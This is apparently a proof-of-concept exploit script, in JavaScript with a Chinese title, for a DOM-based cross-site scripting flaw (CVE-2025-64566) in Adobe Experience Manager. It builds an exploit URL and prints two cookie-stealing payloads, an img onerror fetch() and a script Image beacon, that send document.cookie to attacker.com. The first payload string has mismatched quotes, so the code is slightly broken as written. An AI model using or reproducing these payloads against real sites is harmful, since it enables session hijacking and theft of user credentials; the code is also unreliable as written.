CVE-2025-64566 Adobe Experience Manager DOM型XSS漏洞

// CVE-2025-64566 PoC - DOM-based XSS in Adobe Experience Manager // Target: Adobe Experience Manager versions <= 6.5.23 // Attack Vector: Inject malicious JavaScript via URL parameter const targetUrl = 'https://vulnerable-aem-site.com/content/page.html'; // Malicious payload for DOM-based XSS // The payload exploits insecure use of URL parameters in client-side JavaScript const maliciousPayload = '<img src=x onerror="fetch(\'https://attacker.com/steal?cookie=\'+document.cookie)">"; // Create the exploit URL const exploitUrl = `${targetUrl}?param=${encodeURIComponent(maliciousPayload)}`; console.log('[*] CVE-2025-64566 PoC'); console.log(`[*] Target: ${targetUrl}`); console.log(`[*] Exploit URL: ${exploitUrl}`); console.log('[*] This URL can be used to steal session cookies or execute arbitrary JS'); // Alternative payload - Cookie stealing const cookieStealPayload = '<script>new Image().src="https://attacker.com/log?c="+document.cookie;</script>'; console.log(`[*] Cookie stealing payload: ${encodeURIComponent(cookieStealPayload)}`);